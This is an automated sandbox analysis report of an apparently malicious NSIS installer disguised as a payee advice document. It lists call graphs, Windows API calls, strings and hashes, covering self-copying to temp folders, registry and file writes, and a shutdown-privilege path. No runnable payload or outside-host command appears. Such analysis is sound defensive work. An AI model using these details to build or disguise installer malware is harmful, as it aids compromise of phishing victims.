4065->4066 4067 4051af 4065->4067 4066->4033 4068 4051cb lstrlenW 4067->4068 4069 405f0c 18 API calls 4067->4069 4070 4051f4 4068->4070 4071 4051d9 lstrlenW 4068->4071 4069->4068 4073 405207 4070->4073 4074 4051fa SetWindowTextW 4070->4074 4071->4066 4072 4051eb lstrcatW 4071->4072 4072->4070 4073->4066 4075 40520d SendMessageW SendMessageW SendMessageW 4073->4075 4074->4073 4075->4066 4097 406254 GetModuleHandleA 4076->4097 4080 405dac 4080->4033 4082 406243 FindClose 4081->4082 4083 4058f6 4081->4083 4082->4083 4083->4003 4083->4014 4085 405951 lstrcatW 4084->4085 4086 405900 4084->4086 4085->4086 4086->4019 4087->4039 4089 4059fd 4088->4089 4091 405a0f 4088->4091 4090 405a0a CharNextW 4089->4090 4089->4091 4093 405a33 4090->4093 4092 405962 CharNextW 4091->4092 4091->4093 4092->4091 4093->4042 4093->4043 4095 405736 4094->4095 4096 405b43 SetFileAttributesW 4094->4096 4095->4060 4095->4061 4095->4062 4096->4095 4098 406270 LoadLibraryA 4097->4098 4099 40627b GetProcAddress 4097->4099 4098->4099 4100 405d8b 4098->4100 4099->4100 4100->4080 4101 405c08 lstrcpyW 4100->4101 4102 405c31 4101->4102 4103 405c57 GetShortPathNameW 4101->4103 4126 405b56 GetFileAttributesW CreateFileW 4102->4126 4104 405c6c 4103->4104 4105 405d7e 4103->4105 4104->4105 4107 405c74 wsprintfA 4104->4107 4105->4080 4110 405f0c 18 API calls 4107->4110 4108 405c3b CloseHandle GetShortPathNameW 4108->4105 4109 405c4f 4108->4109 4109->4103 4109->4105 4111 405c9c 4110->4111 4127 405b56 GetFileAttributesW CreateFileW 4111->4127 4113 405ca9 4113->4105 4114 405cb8 GetFileSize GlobalAlloc 4113->4114 4115 405d77 CloseHandle 4114->4115 4116 405cda 4114->4116 4115->4105 4128 405bd9 ReadFile 4116->4128 4121 405cf9 lstrcpyA 4124 405d1b 4121->4124 4122 405d0d 4123 405abb 4 API calls 4122->4123 4123->4124 4125 405d52 SetFilePointer WriteFile GlobalFree 4124->4125 4125->4115 4126->4108 4127->4113 4129 405bf7 4128->4129 4129->4115 4130 405abb lstrlenA 4129->4130 4131 405afc lstrlenA 4130->4131 4132 405b04 4131->4132 4133 405ad5 lstrcmpiA 4131->4133 4132->4121 4132->4122 4133->4132 4134 405af3 CharNextA 4133->4134 4134->4131 5565 402224 5566 40223e 5565->5566 5567 40222b 5565->5567 5568 405f0c 18 API calls 5567->5568 5569 402238 5568->5569 5570 4056c6 MessageBoxIndirectW 5569->5570 5570->5566 5571 10001667 5572 1000152e 4 API calls 5571->5572 5575 1000167f 5572->5575 5573 100016c5 GlobalFree 5574 1000169a 5574->5573 5575->5573 5575->5574 5576 100016b1 VirtualFree 5575->5576 5576->5573 5577 402729 5578 402730 5577->5578 5579 4029c7 5577->5579 5580 402736 FindClose 5578->5580 5580->5579 5581 401cab 5582 402b1d 18 API calls 5581->5582 5583 401cb2 5582->5583 5584 402b1d 18 API calls 5583->5584 5585 401cba GetDlgItem 5584->5585 5586 4024e8 5585->5586 5587 4016af 5588 402b3a 18 API calls 5587->5588 5589 4016b5 GetFullPathNameW 5588->5589 5590 4016f1 5589->5590 5591 4016cf 5589->5591 5592 401706 GetShortPathNameW 5590->5592 5593 4029c7 5590->5593 5591->5590 5594 40622d 2 API calls 5591->5594 5592->5593 5595 4016e1 5594->5595 5595->5590 5597 405eea lstrcpynW 5595->5597 5597->5590 4299 402331 4300 402337 4299->4300 4301 402b3a 18 API calls 4300->4301 4302 402349 4301->4302 4303 402b3a 18 API calls 4302->4303 4304 402353 RegCreateKeyExW 4303->4304 4305 40237d 4304->4305 4309 402793 4304->4309 4306 402398 4305->4306 4307 402b3a 18 API calls 4305->4307 4308 4023a4 4306->4308 4311 402b1d 18 API calls 4306->4311 4310 40238e lstrlenW 4307->4310 4312 4023bf RegSetValueExW 4308->4312 4316 403062 4308->4316 4310->4306 4311->4308 4313 4023d5 RegCloseKey 4312->4313 4313->4309 4317 403072 SetFilePointer 4316->4317 4318 40308e 4316->4318 4317->4318 4331 40317d GetTickCount 4318->4331 4321 405bd9 ReadFile 4322 4030ae 4321->4322 4323 40317d 43 API calls 4322->4323 4327 403139 4322->4327 4324 4030c5 4323->4324 4325 40313f ReadFile 4324->4325 4324->4327 4328 4030d5 4324->4328 4325->4327 4327->4312 4328->4327 4329 405bd9 ReadFile 4328->4329 4330 403108 WriteFile 4328->4330 4329->4328 4330->4327 4330->4328 4332 4032e7 4331->4332 4333 4031ac 4331->4333 4334 402d1a 33 API calls 4332->4334 4344 40330f SetFilePointer 4333->4344 4340 403095 4334->4340 4336 4031b7 SetFilePointer 4342 4031dc 4336->4342 4340->4321 4340->4327 4341 403271 WriteFile 4341->4340 4341->4342 4342->4340 4342->4341 4343 4032c8 SetFilePointer 4342->4343 4345 4032f9 4342->4345 4348 406390 4342->4348 4355 402d1a 4342->4355 4343->4332 4344->4336 4346 405bd9 ReadFile 4345->4346 4347 40330c 4346->4347 4347->4342 4349 4063b5 4348->4349 4350 4063bd 4348->4350 4349->4342 4350->4349 4351 406444 GlobalFree 4350->4351 4352 40644d GlobalAlloc 4350->4352 4353 4064c4 GlobalAlloc 4350->4353 4354 4064bb GlobalFree 4350->4354 4351->4352 4352->4349 4352->4350 4353->4349 4353->4350 4354->4353 4356 402d43 4355->4356 4357 402d2b 4355->4357 4359 402d53 GetTickCount 4356->4359 4360 402d4b 4356->4360 4358 402d34 DestroyWindow 4357->4358 4362 402d3b 4357->4362 4358->4362 4361 402d61 4359->4361 4359->4362 4363 40628d 2 API calls 4360->4363 4364 402d96 CreateDialogParamW ShowWindow 4361->4364 4365 402d69 4361->4365 4362->4342 4363->4362 4364->4362 4365->4362 4370 402cfe 4365->4370 4367 402d77 wsprintfW 4368 405194 25 API calls 4367->4368 4369 402d94 4368->4369 4369->4362 4371 402d0d 4370->4371 4372 402d0f MulDiv 4370->4372 4371->4372 4372->4367 5605 4027b5 5606 402b3a 18 API calls 5605->5606 5607 4027c3 5606->5607 5608 4027d9 5607->5608 5609 402b3a 18 API calls 5607->5609 5610 405b31 2 API calls 5608->5610 5609->5608 5611 4027df 5610->5611 5631 405b56 GetFileAttributesW CreateFileW 5611->5631 5613 4027ec 5614 402895 5613->5614 5615 4027f8 GlobalAlloc 5613->5615 5618 4028b0 5614->5618 5619 40289d DeleteFileW 5614->5619 5616 402811 5615->5616 5617 40288c CloseHandle 5615->5617 5632 40330f SetFilePointer 5616->5632 5617->5614 5619->5618 5621 402817 5622 4032f9 ReadFile 5621->5622 5623 402820 GlobalAlloc 5622->5623 5624 402830 5623->5624 5625 402864 WriteFile GlobalFree 5623->5625 5626 403062 46 API calls 5624->5626 5627 403062 46 API calls 5625->5627 5630 40283d 5626->5630 5628 402889 5627->5628 5628->5617 5629 40285b GlobalFree 5629->5625 5630->5629 5631->5613 5632->5621 5633 4028b6 5634 402b1d 18 API calls 5633->5634 5635 4028bc 5634->5635 5636 4028f8 5635->5636 5637 4028df 5635->5637 5642 402793 5635->5642 5639 402902 5636->5639 5640 40290e 5636->5640 5638 4028e4 5637->5638 5646 4028f5 5637->5646 5647 405eea lstrcpynW 5638->5647 5643 402b1d 18 API calls 5639->5643 5641 405f0c 18 API calls 5640->5641 5641->5646 5643->5646 5646->5642 5648 405e31 wsprintfW 5646->5648 5647->5642 5648->5642 5649 4014b8 5650 4014be 5649->5650 5651 401389 2 API calls 5650->5651 5652 4014c6 5651->5652 4743 4015b9 4744 402b3a 18 API calls 4743->4744 4745 4015c0 4744->4745 4746 4059e0 4 API calls 4745->4746 4756 4015c9 4746->4756 4747 401614 4749 401646 4747->4749 4750 401619 4747->4750 4748 405962 CharNextW 4751 4015d7 CreateDirectoryW 4748->4751 4755 401423 25 API calls 4749->4755 4752 401423 25 API calls 4750->4752 4753 4015ed GetLastError 4751->4753 4751->4756 4754 401620 4752->4754 4753->4756 4757 4015fa GetFileAttributesW 4753->4757 4761 405eea lstrcpynW 4754->4761 4760 40163e 4755->4760 4756->4747 4756->4748 4757->4756 4759 40162d SetCurrentDirectoryW 4759->4760 4761->4759 5653 401939 5654 402b3a 18 API calls 5653->5654 5655 401940 lstrlenW 5654->5655 5656 4024e8 5655->5656 5657 40293b 5658 402b1d 18 API calls 5657->5658 5659 402941 5658->5659 5660 402974 5659->5660 5661 402793 5659->5661 5663 40294f 5659->5663 5660->5661 5662 405f0c 18 API calls 5660->5662 5662->5661 5663->5661 5665 405e31 wsprintfW 5663->5665 5665->5661 4979 40173f 4980 402b3a 18 API calls 4979->4980 4981 401746 4980->4981 4982 405b85 2 API calls 4981->4982 4983 40174d 4982->4983 4984 405b85 2 API calls 4983->4984 4984->4983 5666 40653f 5668 4063c3 5666->5668 5667 406d2e 5668->5667 5669 406444 GlobalFree 5668->5669 5670 40644d GlobalAlloc 5668->5670 5671 4064c4 GlobalAlloc 5668->5671 5672 4064bb GlobalFree 5668->5672 5669->5670 5670->5667 5670->5668 5671->5667 5671->5668 5672->5671

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 28 403470-403486 26->28 29 40349c-4034b2 26->29 33 403448-40344b 27->33 34 40344d 27->34 28->29 35 403488-403490 28->35 29->22 37 4034b4-4034c9 29->37 33->26 33->34 34->26 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->29 40->41 41->29 42->24 42->44 43->16 55 403631-403641 call 4056c6 ExitProcess 44->55 56 403727-40372d 44->56 48 403594-40359f call 405962 45->48 49 40360c-403613 call 4038b4 45->49 62 4035a1-4035b2 48->62 63 4035d6-4035e0 48->63 58 403618 49->58 60 4037aa-4037b2 56->60 61 40372f-40374c call 406254 * 3 56->61 58->44 65 4037b4 60->65 66 4037b8-4037bc ExitProcess 60->66 90 403796-4037a1 ExitWindowsEx 61->90 91 40374e-403750 61->91 64 4035b4-4035b6 62->64 68 4035e2-4035f0 call 405a3d 63->68 69 403647-403661 lstrcatW lstrcmpiW 63->69 71 4035d0-4035d4 64->71 72 4035b8-4035ce 64->72 65->66 68->44 81 4035f2-403608 call 405eea * 2 68->81 69->44 74 403663-403679 CreateDirectoryW SetCurrentDirectoryW 69->74 71->63 71->64 72->63 72->71 78 403686-4036af call 405eea 74->78 79 40367b-403681 call 405eea 74->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->49 100 403711-403719 89->100 101 4036d2-4036e2 CopyFileW 89->101 90->60 96 4037a3-4037a5 call 40140b 90->96 91->90 94 403752-403754 91->94 94->90 98 403756-403768 GetCurrentProcess 94->98 96->60 98->90 108 40376a-40378c 98->108 100->89 103 40371b-403722 call 405d84 100->103 101->100 102 4036e4-403704 call 405d84 call 405f0c call 405665 101->102 102->100 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->100
                                                                                                                                          APIs
                                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000), ref: 004033DB
                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000020), ref: 00403402
                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
                                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000,?), ref: 0040364D
                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe",00000000,?), ref: 00403659
                                                                                                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                                                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,0041FE90,00000001), ref: 004036DA
                                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\Desktop$C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                          • API String ID: 4107622049-1871193868
                                                                                                                                          • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                          • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                          • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                          • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 130 404e93-404e9a 125->130 133 404dc4-404dcb 126->133 134 404db7-404dbe 126->134 131 404c20-404c3d call 405f0c SendMessageW * 2 127->131 132 404c1d 127->132 128->124 129 404c45-404c71 call 40412f * 2 128->129 172 404c77-404c7d 129->172 173 404d3c-404d4f GetWindowLongW SetWindowLongW 129->173 136 404f0b-404f13 130->136 137 404e9c-404ea2 130->137 131->128 132->131 139 404e40-404e43 133->139 140 404dcd-404dd0 133->140 134->130 134->133 145 404f15-404f1b SendMessageW 136->145 146 404f1d-404f24 136->146 142 4050f3-405105 call 404196 137->142 143 404ea8-404eb2 137->143 139->130 144 404e45-404e4f 139->144 148 404dd2-404dd9 140->148 149 404ddb-404df0 call 404a5e 140->149 143->142 154 404eb8-404ec7 SendMessageW 143->154 156 404e51-404e5d SendMessageW 144->156 157 404e5f-404e69 144->157 145->146 150 404f26-404f2d 146->150 151 404f58-404f5f 146->151 148->139 148->149 149->139 171 404df2-404e03 149->171 159 404f36-404f3d 150->159 160 404f2f-404f30 ImageList_Destroy 150->160 163 4050b5-4050bc 151->163 164 404f65-404f71 call 4011ef 151->164 154->142 165 404ecd-404ede SendMessageW 154->165 156->157 157->130 158 404e6b-404e75 157->158 167 404e86-404e90 158->167 168 404e77-404e84 158->168 169 404f46-404f52 159->169 170 404f3f-404f40 GlobalFree 159->170 160->159 163->142 177 4050be-4050c5 163->177 190 404f81-404f84 164->190 191 404f73-404f76 164->191 175 404ee0-404ee6 165->175 176 404ee8-404eea 165->176 167->130 168->130 169->151 170->169 171->139 178 404e05-404e07 171->178 179 404c80-404c87 172->179 183 404d55-404d59 173->183 175->176 181 404eeb-404f04 call 401299 SendMessageW 175->181 176->181 177->142 182 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 177->182 186 404e09-404e10 178->186 187 404e1a 178->187 188 404d1d-404d30 179->188 189 404c8d-404cb5 179->189 181->136 182->142 184 404d73-404d7b call 404164 183->184 185 404d5b-404d6e ShowWindow call 404164 183->185 184->118 185->142 195 404e12-404e14 186->195 196 404e16-404e18 186->196 199 404e1d-404e39 call 40117d 187->199 188->179 203 404d36-404d3a 188->203 197 404cb7-404ced SendMessageW 189->197 198 404cef-404cf1 189->198 204 404fc5-404fe9 call 4011ef 190->204 205 404f86-404f9f call 4012e2 call 401299 190->205 200 404f78 191->200 201 404f79-404f7c call 404ade 191->201 195->199 196->199 197->188 206 404cf3-404d02 SendMessageW 198->206 207 404d04-404d1a SendMessageW 198->207 199->139 200->201 201->190 203->173 203->183 218 40508b-40509f InvalidateRect 204->218 219 404fef 204->219 224 404fa1-404fa7 205->224 225 404faf-404fbe SendMessageW 205->225 206->188 207->188 218->163 221 4050a1-4050b0 call 404a31 call 404978 218->221 222 404ff2-404ffd 219->222 221->163 226 405073-405085 222->226 227 404fff-40500e 222->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->204 226->218 226->222 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 234 405026-405029 232->234 235 40502b-405034 232->235 236 405039-405071 SendMessageW * 2 234->236 235->236 237 405036 235->237 236->226 237->236
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                          • String ID: $M$N
                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                          • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                          • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                          • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                          • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 682 405f0c-405f17 683 405f19-405f28 682->683 684 405f2a-405f40 682->684 683->684 685 405f46-405f53 684->685 686 406158-40615e 684->686 685->686 687 405f59-405f60 685->687 688 406164-40616f 686->688 689 405f65-405f72 686->689 687->686 691 406171-406175 call 405eea 688->691 692 40617a-40617b 688->692 689->688 690 405f78-405f84 689->690 693 406145 690->693 694 405f8a-405fc6 690->694 691->692 696 406153-406156 693->696 697 406147-406151 693->697 698 4060e6-4060ea 694->698 699 405fcc-405fd7 GetVersion 694->699 696->686 697->686 702 4060ec-4060f0 698->702 703 40611f-406123 698->703 700 405ff1 699->700 701 405fd9-405fdd 699->701 709 405ff8-405fff 700->709 701->700 706 405fdf-405fe3 701->706 707 406100-40610d call 405eea 702->707 708 4060f2-4060fe call 405e31 702->708 704 406132-406143 lstrlenW 703->704 705 406125-40612d call 405f0c 703->705 704->686 705->704 706->700 712 405fe5-405fe9 706->712 716 406112-40611b 707->716 708->716 714 406001-406003 709->714 715 406004-406006 709->715 712->700 719 405feb-405fef 712->719 714->715 717 406042-406045 715->717 718 406008-406025 call 405db7 715->718 716->704 721 40611d 716->721 723 406055-406058 717->723 724 406047-406053 GetSystemDirectoryW 717->724 726 40602a-40602e 718->726 719->709 725 4060de-4060e4 call 40617e 721->725 728 4060c3-4060c5 723->728 729 40605a-406068 GetWindowsDirectoryW 723->729 727 4060c7-4060cb 724->727 725->704 730 406034-40603d call 405f0c 726->730 731 4060cd-4060d1 726->731 727->725 727->731 728->727 732 40606a-406074 728->732 729->728 730->727 731->725 735 4060d3-4060d9 lstrcatW 731->735 737 406076-406079 732->737 738 40608e-4060a4 SHGetSpecialFolderLocation 732->738 735->725 737->738 742 40607b-406082 737->742 739 4060a6-4060bd SHGetPathFromIDListW CoTaskMemFree 738->739 740 4060bf 738->740 739->727 739->740 740->728 743 40608a-40608c 742->743 743->727 743->738
                                                                                                                                          APIs
                                                                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
